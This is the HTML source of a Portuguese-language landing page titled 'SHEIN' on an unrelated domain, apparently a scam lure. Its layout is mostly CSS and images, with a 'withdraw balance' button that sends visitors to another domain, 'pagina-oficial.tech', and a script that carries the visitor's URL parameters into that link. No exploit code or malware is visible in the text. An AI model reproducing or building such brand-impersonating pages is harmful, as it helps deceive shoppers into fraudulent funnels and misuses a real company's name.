
<!DOCTYPE html>
<html lang="pt-BR" dir="ltr">
<head>
<meta name="robots" content="noindex, nofollow">
<link rel="shortcut icon" href="data:" />
<meta property="og:type" content="website">
<meta property="og:url" content="https://aplicativoslucrativos.online/01-01">
<meta property="og:title" content="SHEIN">
<meta property="og:description" content="SHEIN">
<meta property="og:image" content="https://img.imageboss.me/atm/cdn/format:auto/u/3le7XFfXepdKc8OxOsCs6NEThs33/l/sKPvWq4913275.jpeg">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title>SHEIN</title>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800&family=Roboto:wght@300;400;500;600;700;800&family=Montserrat:wght@300;400;500;600;700;800&display=swap" rel="stylesheet" media="print" onload="this.onload=null;this.removeAttribute('media');">
<style>@media (max-width:640px){.atm-hidden-mobile{display:none}}@media (min-width:640px){.atm-hidden-desktop{display:none}}.col-span-1{grid-column: span 1 / span 1;}.col-span-2{grid-column: span 2 / span 2;}.items-center{align-items:center}.grid-cols-6{grid-template-columns: repeat(6, minmax(0, 1fr))}.grid-cols-5{	grid-template-columns: repeat(5, minmax(0, 1fr))}.grid-cols-4{grid-template-columns: repeat(4, minmax(0, 1fr))}.grid-cols-2{grid-template-columns: repeat(2, minmax(0, 1fr))}.grid-cols-3{grid-template-columns: repeat(3, minmax(0, 1fr))}.grid-cols-1{grid-template-columns: repeat(1, minmax(0, 1fr))}.grid{display:grid}.basis-1\/2{flex-basis:50%}.flex{display:flex}.gap-1{gap:4px}.gap-2{gap:8px}.gap-4{gap:16px}.gap-6{gap:24px}.gap-12{48px}.gap-24{gap:96px}.justify-center{justify-content:center}.basis-full{flex-basis:100%}html{scroll-behavior:smooth;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-webkit-tap-highlight-color:transparent}body,center,dd,del,div,dt,em,footer,h1,h2,h3,h4,h5,h6,i,iframe,img,p,q,s,small,span,strike,strong,sub,sup,table,tbody,td,tr,u{margin:-1px 0 0 0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline;font-family:Roboto,sans-serif}.u{-moz-user-select:none;-webkit-user-select:none;cursor:default}table{border-collapse:collapse;border-spacing:0}body{line-height:1}body{background-color:#ffffff;overflow-x:hidden}iframe,img,svg{max-width:100%}h1,h1 b,h1 span,h2,h2 b,h2 span,h3,h3 b,h3 span{font-family:Poppins,sans-serif}a{text-decoration:none;font-family:Roboto,sans-serif}a.btn{font-family:Montserrat,sans-serif}em span.lg,em span.md,em span.sm{font-style:italic}@media (max-width:600px){.flex-large,.flex-small{margin-right:0!important;margin-bottom:16px}}.flexrow{display:flex;flex-direction:row;flex-wrap:wrap;align-items:center}.flex-large,.flex-small{flex-basis:100%}.flex-large:last-child,.flex-small:last-child{margin-right:0!important}@media (min-width:600px){.flex-small{flex:1;margin-bottom:0!important;padding-bottom:0!important}.flex-small.half{flex:0 0 calc(1 / 2 * 100%)}.flex-small.one-fifth{flex:0 0 calc(1 / 5 * 100%)}.flex-small.two-fifths{flex:0 0 calc(2 / 5 * 100%)}.flex-small.one-fourth{flex:0 0 calc(1 / 4 * 100%)}.flex-small.two-fourths{flex:0 0 calc(2 / 4 * 100%)}.flex-small.three-fourths{flex:0 0 calc(3 / 4 * 100%)}.flex-small.one-third{flex:0 0 calc(1 / 3 * 100%)}.flex-small.two-thirds{flex:0 0 calc(2 / 3 * 100%)}}@media (min-width:1000px){.flex-large{flex:1;margin-bottom:0}.flex-large.half{flex:0 0 calc(1 / 2 * 100%)}.flex-large.one-fifth{flex:0 0 calc(1 / 5 * 100%)}.flex-large.two-fifths{flex:0 0 calc(2 / 5 * 100%)}.flex-large.one-fourth,.flex-large.two-fourths{flex:0 0 calc(1 / 4 * 100%)}.flex-large.three-fourths{flex:0 0 calc(3 / 4 * 100%)}.flex-large.one-third{flex:0 0 calc(1 / 3 * 100%)}.flex-large.two-thirds{flex:0 0 calc(2 / 3 * 100%)}}@media (min-width:640px){.sm\:gap-1{gap:6px}.sm\:gap-2{gap:12px!important}.sm\:gap-4{gap:24px}.sm\:gap-6{gap:32px}.sm\:gap-12{gap:64px}.sm\:gap-24{gap:128px}.sm\:grid-cols-6{grid-template-columns:repeat(6,minmax(0,1fr))}.sm\:grid-cols-5{grid-template-columns:repeat(5,minmax(0,1fr))}.sm\:grid-cols-4{grid-template-columns:repeat(4,minmax(0,1fr))}.sm\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}.sm\:grid-cols-3{grid-template-columns:repeat(3,minmax(0,1fr))}.sm\:grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))}}</style>
</head>
<body id="_3le7XFfXepdKc8OxOsCs6NEThs33" data-page="_7HoZ1DiMrkiw1EiaVeL4">
<style>
.ckYIKn0117991 {display: none}
@media (max-width: 640px) {
html {overflow-x:hidden}
}
</style>
<style>.zooming { animation: zooming 1.25s ease infinite; } @keyframes zooming { 0% { transform: scale(1, 1); } 50% { transform: scale(1.1, 1.1); } 100% { transform: scale(1, 1); } }</style>
<div class="division-YpMKqb7922243__wrapper">
<style>
#division-YpMKqb7922243 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-YpMKqb7922243 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-YpMKqb7922243 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-YpMKqb7922243" class="Xspqly0101623">
<div class="image-XbqAqk7928890">
<style>
.image-XbqAqk7928890-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-XbqAqk7928890-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-XbqAqk7928890-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-XbqAqk7928890-element">
<img loading="eager" src="https://img.imageboss.me/atm/cdn/format:auto/u/3le7XFfXepdKc8OxOsCs6NEThs33/l/RrtFLx5801405.png" alt="">
</div>
</div>
</div>
</div>
<div class="division-asxspa8030649__wrapper">
<style>
#division-asxspa8030649 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-asxspa8030649 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-asxspa8030649 {
margin: 0;
padding: 1.5vh 1.5vw 0.001vh 1.5vw;
}
}
</style>
<div id="division-asxspa8030649" class="YzAxtE0101623">
<div class="image-wEiaeH8097618">
<style>
.image-wEiaeH8097618-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-wEiaeH8097618-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-wEiaeH8097618-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-wEiaeH8097618-element">
<img loading="lazy" src="https://img.imageboss.me/atm/cdn/format:auto/u/3le7XFfXepdKc8OxOsCs6NEThs33/l/jQLkRH5952321.png" alt="">
</div>
</div>
</div>
</div>
<div class="division-cpmYXK8233369__wrapper">
<style>
#division-cpmYXK8233369 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-cpmYXK8233369 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-cpmYXK8233369 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-cpmYXK8233369" class="dCLduW0101623">
<div class="button-yEHEEe8317443">
<style>
a.button-yEHEEe8317443-element {
background-color: #009f00;
border-radius: 8px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: -27vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-yEHEEe8317443-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-yEHEEe8317443-element {
font-size: 1.69vw;
margin: -17.82vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-yEHEEe8317443-element {
font-size: 3.50vw;
padding: 12px 24px 12px 24px;
margin: -13.5vh auto 1vh auto;
}
}
</style>
<a href="#division-RbwaEJ1449765" target="_self" class="btn button-yEHEEe8317443-element zooming">
COMEÇAR AGORA
</a>
</div>
</div>
</div>
<div class="division-fpRxsS8542355__wrapper">
<style>
#division-fpRxsS8542355 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-fpRxsS8542355 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-fpRxsS8542355 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-fpRxsS8542355" class="eeJLnn0101623">
<div class="headline-wvdzjs8557269">
<style>
.headline-wvdzjs8557269-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-wvdzjs8557269-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-wvdzjs8557269-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-wvdzjs8557269-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-BSHfgY8580267">
<style>
.headline-BSHfgY8580267-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-BSHfgY8580267-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-BSHfgY8580267-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-BSHfgY8580267-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-cFhbzl8580132">
<style>
.headline-cFhbzl8580132-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-cFhbzl8580132-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-cFhbzl8580132-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-cFhbzl8580132-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-WCRQKv8579981">
<style>
.headline-WCRQKv8579981-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-WCRQKv8579981-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-WCRQKv8579981-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-WCRQKv8579981-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-DXWSjl8578980">
<style>
.headline-DXWSjl8578980-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-DXWSjl8578980-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-DXWSjl8578980-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-DXWSjl8578980-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-HlYkCG8578855">
<style>
.headline-HlYkCG8578855-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-HlYkCG8578855-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-HlYkCG8578855-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-HlYkCG8578855-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-YxGkPA8577808">
<style>
.headline-YxGkPA8577808-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-YxGkPA8577808-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-YxGkPA8577808-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-YxGkPA8577808-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-nCRAxa8577454">
<style>
.headline-nCRAxa8577454-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-nCRAxa8577454-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-nCRAxa8577454-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-nCRAxa8577454-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-xpjvjW8556705">
<style>
.headline-xpjvjW8556705-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-xpjvjW8556705-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-xpjvjW8556705-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-xpjvjW8556705-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-biDlRc8555223">
<style>
.headline-biDlRc8555223-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-biDlRc8555223-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-biDlRc8555223-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-biDlRc8555223-element headline">
<h1>
</h1>
</div>
</div>
<div class="headline-eBndFl8552170">
<style>
.headline-eBndFl8552170-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 500;
false
}
@media (max-width: 1200px) {
.headline-eBndFl8552170-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-eBndFl8552170-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-eBndFl8552170-element headline">
<h1>
</h1>
</div>
</div>
</div>
</div>
<div class="division-RbwaEJ1449765__wrapper">
<style>
#division-RbwaEJ1449765 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-RbwaEJ1449765 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-RbwaEJ1449765 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-RbwaEJ1449765" class="DgXpzr0101625">
<div class="image-uzbbha2791451">
<style>
.image-uzbbha2791451-element img {
cursor: pointer;
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-uzbbha2791451-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-uzbbha2791451-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-uzbbha2791451-element">
<img class="image_uzbbha2791451" loading="lazy" src="https://img.imageboss.me/atm/cdn/format:auto/u/3le7XFfXepdKc8OxOsCs6NEThs33/l/oWiBEX6266116.png" alt="">
</div>
</div>
</div>
</div>
<div class="division-xnzeYD2884668__wrapper">
<style>
#division-xnzeYD2884668 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-xnzeYD2884668 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-xnzeYD2884668 {
margin: 0;
padding: 3.75vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-xnzeYD2884668" class="aBNJkA0101625">
<div class="image-EXJqwJ3211201">
<style>
.image-EXJqwJ3211201-element img {
cursor: pointer;
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-EXJqwJ3211201-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-EXJqwJ3211201-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-EXJqwJ3211201-element">
<img class="image_EXJqwJ3211201" loading="lazy" src="https://img.imageboss.me/atm/cdn/format:auto/u/3le7XFfXepdKc8OxOsCs6NEThs33/l/cCMyak6318461.png" alt="">
</div>
</div>
</div>
</div>
<div class="division-DaJwRg3239589__wrapper">
<style>
#division-DaJwRg3239589 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-DaJwRg3239589 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-DaJwRg3239589 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-DaJwRg3239589" class="NpWrcG0101626">
<div class="image-zmKxei3239589">
<style>
.image-zmKxei3239589-element img {
cursor: pointer;
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-zmKxei3239589-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-zmKxei3239589-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-zmKxei3239589-element">
<img class="image_zmKxei3239589" loading="lazy" src="https://img.imageboss.me/atm/cdn/format:auto/u/3le7XFfXepdKc8OxOsCs6NEThs33/l/EAhDMy6365122.png" alt="">
</div>
</div>
</div>
</div>
<div class="division-fdzDWS3311747__wrapper">
<style>
#division-fdzDWS3311747 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-fdzDWS3311747 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-fdzDWS3311747 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-fdzDWS3311747" class="Qlxoar0101626">
<div class="image-fJFFJq3311747">
<style>
.image-fJFFJq3311747-element img {
cursor: pointer;
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-fJFFJq3311747-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-fJFFJq3311747-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-fJFFJq3311747-element">
<img class="image_fJFFJq3311747" loading="lazy" src="https://img.imageboss.me/atm/cdn/format:auto/u/3le7XFfXepdKc8OxOsCs6NEThs33/l/oLwmQF6424244.png" alt="">
</div>
</div>
</div>
</div>
<div class="division-uunYwW8144370__wrapper">
<style>
#division-uunYwW8144370 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #F1F1F1;
}
@media (max-width:1200px) {
#division-uunYwW8144370 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-uunYwW8144370 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-uunYwW8144370" class="EBCBoJ0101626">
<div class="button-uyHWaK8151577">
<style>
a.button-uyHWaK8151577-element {
background-color: #9207d7;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: -5vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-uyHWaK8151577-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-uyHWaK8151577-element {
font-size: 1.69vw;
margin: -3.3000000000000003vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-uyHWaK8151577-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: -2.5vh auto 1vh auto;
}
}
</style>
<a href="https://pagina-oficial.tech/n2" target="_self" class="btn button-uyHWaK8151577-element zooming">
SACAR SALDO
</a>
</div>
</div>
</div>
<script src="/01-01/js/ckYIKn0117991.js" charset="utf-8"></script>
<script>document.addEventListener("DOMContentLoaded",(()=>{document.querySelectorAll("a").forEach((e=>{e.getAttribute("href").includes("#")||(e.getAttribute("href").includes("?")?e.setAttribute("href",e.getAttribute("href")+window.location.search.replace("?","&")):e.setAttribute("href",e.getAttribute("href")+window.location.search))}))}));</script>
<script type="text/javascript">document.head.appendChild(Object.assign(document.createElement("script"), {src: "https://cdn.atomicatpages.com/a.js?cache=" + Math.floor((Math.random() * 100000)),async: true}));</script>
</body>
</html>